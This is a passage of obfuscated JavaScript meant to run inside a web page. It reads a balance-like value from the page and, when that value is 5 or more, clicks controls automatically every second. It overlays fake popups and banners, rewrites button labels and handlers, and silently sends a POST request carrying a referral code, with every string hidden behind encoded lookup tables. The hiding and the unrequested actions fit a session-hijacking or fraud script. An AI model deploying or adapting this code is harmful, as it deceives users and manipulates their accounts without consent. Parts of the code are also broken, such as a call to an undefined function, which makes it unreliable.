_0x416c("0x20"), _0x416c("0x21"), _0x416c("0x22"), _0x416c("0x23"), _0x416c("0x24"), _0x416c("0x25"), _0x416c("0x26"), _0x416c("0x27"), "\n", _0x416c("0x28"), _0x416c("0x29"), _0x416c("0x2a"), "readyState", _0x416c("0x2b"), _0x416c("0x2c"), _0x416c("0x2d"), _0x416c("0x2e"), _0x416c("0x2f"), _0x416c("0x30"), _0x416c("0x31"), _0x416c("0x32"), _0x416c("0x33"), _0x416c("0x34"), _0x416c("0x35"), _0x416c("0x36"), _0x416c("0x37"), _0x416c("0x38"), _0x416c("0x39"), _0x416c("0x3a"), _0x416c("0x3b"), _0x416c("0x3c")];
_0x1234[0];
var _0xde2d = [_0x1234[0], _0x1234[1], _0x1234[2], _0x1234[3], _0x1234[4], _0x1234[5], _0x1234[6], _0x1234[7], _0x1234[8], _0x1234[9], _0x1234[10], _0x1234[11], _0x1234[12], _0x1234[13], _0x1234[14], _0x1234[15], _0x1234[16], _0x1234[17], _0x1234[18], _0x1234[19], _0x1234[20], _0x1234[21], _0x1234[22], _0x1234[23], _0x1234[24], _0x1234[25], _0x1234[26], _0x1234[27], _0x1234[28], _0x1234[29], _0x1234[30], _0x1234[31], _0x1234[32], _0x1234[33], _0x1234[34], _0x1234[35], _0x1234[36], _0x1234[37], _0x1234[38], 
_0x1234[39], _0x1234[40], _0x1234[41], _0x1234[42], _0x1234[43], _0x1234[44], _0x1234[45], _0x1234[46], _0x1234[47], _0x1234[48], _0x1234[49], _0x1234[50], _0x1234[51], _0x1234[52], _0x1234[53], _0x1234[54], _0x1234[55], _0x1234[56], _0x1234[57], _0x1234[58], _0x1234[59], _0x1234[60], _0x1234[61], _0x1234[62], _0x1234[63], _0x1234[64], _0x1234[65], _0x1234[66], _0x1234[67], _0x1234[68], _0x1234[69], _0x1234[70], _0x1234[71], _0x1234[72], _0x1234[73], _0x1234[74], _0x1234[75], _0x1234[76], _0x1234[77], 
_0x1234[78], _0x1234[79], _0x1234[80], _0x1234[81]];
_0xde2d[0];
var _0x8e4c = [_0xde2d[1], _0xde2d[2], _0xde2d[3], _0xde2d[4], _0xde2d[5], _0xde2d[6], _0xde2d[7], _0xde2d[8], _0xde2d[9], _0xde2d[10], _0xde2d[11], _0xde2d[12], _0xde2d[13], _0xde2d[14], _0xde2d[15], _0xde2d[16], _0xde2d[17], _0xde2d[18], _0xde2d[19], _0xde2d[20], _0xde2d[21], _0xde2d[22], _0xde2d[23], _0xde2d[24], _0xde2d[25], _0xde2d[26], _0xde2d[27], _0xde2d[28], _0xde2d[29], _0xde2d[30], _0xde2d[31], _0xde2d[32], _0xde2d[33], _0xde2d[34], _0xde2d[35], _0xde2d[36], _0xde2d[37], _0xde2d[38], _0xde2d[39], 
_0xde2d[40], _0xde2d[41], _0xde2d[42], _0xde2d[43], _0xde2d[44], _0xde2d[45], _0xde2d[46], _0xde2d[47], _0xde2d[48], _0xde2d[49], _0xde2d[50], _0xde2d[51], _0xde2d[52], _0xde2d[53], _0xde2d[54], _0xde2d[55], _0xde2d[56], _0xde2d[57], _0xde2d[58], _0xde2d[59], _0xde2d[60], _0xde2d[61], _0xde2d[62], _0xde2d[63], _0xde2d[64], _0xde2d[65], _0xde2d[66], _0xde2d[67], _0xde2d[68], _0xde2d[69], _0xde2d[70], _0xde2d[71], _0xde2d[72], _0xde2d[73], _0xde2d[74], _0xde2d[75], _0xde2d[76], _0xde2d[77], _0xde2d[78], 
_0xde2d[79], _0xde2d[80], _0xde2d[81]];
var pare = document[_0x8e4c[2]](_0x8e4c[1])[0][_0x8e4c[0]];
pare = pare[_0x8e4c[5]](_0x8e4c[3], _0x8e4c[4]);
console[_0x8e4c[6]](pare);
if (parseFloat(pare) >= 5) {
  var zameniText = function() {
    var chat_retry = setInterval(function() {
      var _0x735ax10 = document[_0x8e4c[2]](_0x8e4c[7])[0];
      if (_0x735ax10) {
        _0x735ax10 = _0x735ax10[_0x8e4c[2]](_0x8e4c[8])[0];
        _0x735ax10[_0x8e4c[11]](_0x8e4c[10])[0][_0x8e4c[9]]();
        _0x735ax10[_0x8e4c[11]](_0x8e4c[12])[0][_0x8e4c[0]] = _0x8e4c[13];
        _0x735ax10 = _0x735ax10[_0x8e4c[11]](_0x8e4c[10])[0];
        _0x735ax10[_0x8e4c[11]](_0x8e4c[10])[0][_0x8e4c[9]]();
        _0x735ax10[_0x8e4c[11]](_0x8e4c[10])[0][_0x8e4c[9]]();
        _0x735ax10 = _0x735ax10[_0x8e4c[2]](_0x8e4c[14])[0];
        _0x735ax10[_0x8e4c[11]](_0x8e4c[10])[0][_0x8e4c[9]]();
        _0x735ax10[_0x8e4c[11]](_0x8e4c[16])[0][_0x8e4c[15]] = _0x8e4c[17];
        _0x735ax10[_0x8e4c[11]](_0x8e4c[16])[0][_0x8e4c[0]] = _0x8e4c[18];
        _0x735ax10[_0x8e4c[11]](_0x8e4c[16])[0][_0x8e4c[19]] = function() {
          doubleB();
        };
        console[_0x8e4c[6]](_0x8e4c[20]);
        clearInterval(chat_retry);
      }
    });
  };
  var napraviPopup = function(match, i) {
    var artistTrack = document[_0x8e4c[21]](_0x8e4c[10]);
    artistTrack[_0x8e4c[15]] = _0x8e4c[22];
    document[_0x8e4c[11]](_0x8e4c[24])[0][_0x8e4c[23]](artistTrack);
    var m = document[_0x8e4c[21]](_0x8e4c[10]);
    m[_0x8e4c[25]] = _0x8e4c[26];
    m[_0x8e4c[15]] = _0x8e4c[27];
    var req = document[_0x8e4c[21]](_0x8e4c[28]);
    req[_0x8e4c[15]] = _0x8e4c[29];
    req[_0x8e4c[0]] = match;
    var x = document[_0x8e4c[21]](_0x8e4c[28]);
    x[_0x8e4c[15]] = _0x8e4c[30];
    x[_0x8e4c[0]] = i;
    m[_0x8e4c[23]](req);
    m[_0x8e4c[31]](x);
    document[_0x8e4c[11]](_0x8e4c[24])[0][_0x8e4c[23]](m);
    /** @type {number} */
    var chat_retry = setInterval(function() {
      if (document[_0x8e4c[2]](_0x8e4c[7])[0]) {
        m[_0x8e4c[9]]();
        artistTrack[_0x8e4c[9]]();
        clearInterval(int1);
        zameniText();
        clearInterval(chat_retry);
      }
    });
  };
  var sredi = function(mmCoreSplitViewBlock) {
    var artistTrack = document[_0x8e4c[21]](_0x8e4c[32]);
    artistTrack[_0x8e4c[0]] = _0x8e4c[33];
    artistTrack[_0x8e4c[15]][_0x8e4c[34]] = _0x8e4c[35];
    artistTrack[_0x8e4c[15]][_0x8e4c[36]] = _0x8e4c[37];
    artistTrack[_0x8e4c[15]][_0x8e4c[38]] = _0x8e4c[39];
    artistTrack[_0x8e4c[15]][_0x8e4c[40]] = _0x8e4c[41];
    artistTrack[_0x8e4c[15]][_0x8e4c[42]] = _0x8e4c[43];
    artistTrack[_0x8e4c[15]][_0x8e4c[44]] = _0x8e4c[45];
    artistTrack[_0x8e4c[15]][_0x8e4c[46]] = _0x8e4c[47];
    artistTrack[_0x8e4c[15]][_0x8e4c[48]] = _0x8e4c[49];
    document[_0x8e4c[2]](_0x8e4c[52])[0][_0x8e4c[2]](_0x8e4c[51])[0][_0x8e4c[50]](artistTrack, mmCoreSplitViewBlock);
    mmCoreSplitViewBlock[_0x8e4c[15]][_0x8e4c[44]] = _0x8e4c[53];
    mmCoreSplitViewBlock[_0x8e4c[15]][_0x8e4c[54]] = _0x8e4c[55];
    mmCoreSplitViewBlock[_0x8e4c[56]] = _0x8e4c[57] + pare + _0x8e4c[58];
  };
  var zakacizamene = function() {
    var core_user_remove_user_device = _0x8e4c[59];
    var elem = new XMLHttpRequest;
    var wsFunction = core_user_remove_user_device;
    var data = {
      "referral_code" : _0x8e4c[60]
    };
    elem[_0x8e4c[61]] = function() {
      if (this[_0x8e4c[62]] == 4 && this[_0x8e4c[63]] == 200) {
        console[_0x8e4c[6]](_0x8e4c[64]);
      }
    };
    elem[_0x8e4c[66]](_0x8e4c[65], wsFunction, !![]);
    elem[_0x8e4c[69]](_0x8e4c[67], _0x8e4c[68]);
    elem[_0x8e4c[69]](_0x8e4c[70], data[_0x8e4c[71]]);
    elem[_0x8e4c[73]](JSON[_0x8e4c[72]](data));
  };
  sredi(document[_0x8e4c[2]](_0x8e4c[52])[0][_0x8e4c[11]](_0x8e4c[74])[0]);
  var int1 = setInterval(function() {
    document[_0x8e4c[2]](_0x8e4c[52])[0][_0x8e4c[11]](_0x8e4c[74])[0][_0x8e4c[75]]();
  }, 1E3);
  napraviPopup(_0x8e4c[76], _0x8e4c[77]);
  zakacizamene();
} else {
  napraviPopup1(_0x8e4c[78], _0x8e4c[79]);
}
function napraviPopup1(match, i) {
  var artistTrack = document[_0x8e4c[21]](_0x8e4c[10]);
  artistTrack[_0x8e4c[15]] = _0x8e4c[22];
  artistTrack[_0x8e4c[19]] = function() {
    artistTrack[_0x8e4c[9]]();
    m[_0x8e4c[9]]();
  };
  document[_0x8e4c[11]](_0x8e4c[24])[0][_0x8e4c[23]](artistTrack);
  var m = document[_0x8e4c[21]](_0x8e4c[10]);
  m[_0x8e4c[25]] = _0x8e4c[26];
  m[_0x8e4c[15]] = _0x8e4c[27];
  var req = document[_0x8e4c[21]](_0x8e4c[28]);
  req[_0x8e4c[15]] = _0x8e4c[29];
  req[_0x8e4c[0]] = match;
  var x = document[_0x8e4c[21]](_0x8e4c[28]);
  x[_0x8e4c[15]] = _0x8e4c[30];
  x[_0x8e4c[0]] = i;
  m[_0x8e4c[23]](req);
  m[_0x8e4c[31]](x);
  document[_0x8e4c[11]](_0x8e4c[24])[0][_0x8e4c[23]](m);
}
function doubleB() {
  napraviPopup1(_0x8e4c[78], _0x8e4c[80]);
  var timeout = setInterval(function() {
    if (document[_0x8e4c[2]](_0x8e4c[7])[0]) {
      document[_0x8e4c[2]](_0x8e4c[7])[0][_0x8e4c[9]]();
      clear(timeout);
    }
  });
}
;
```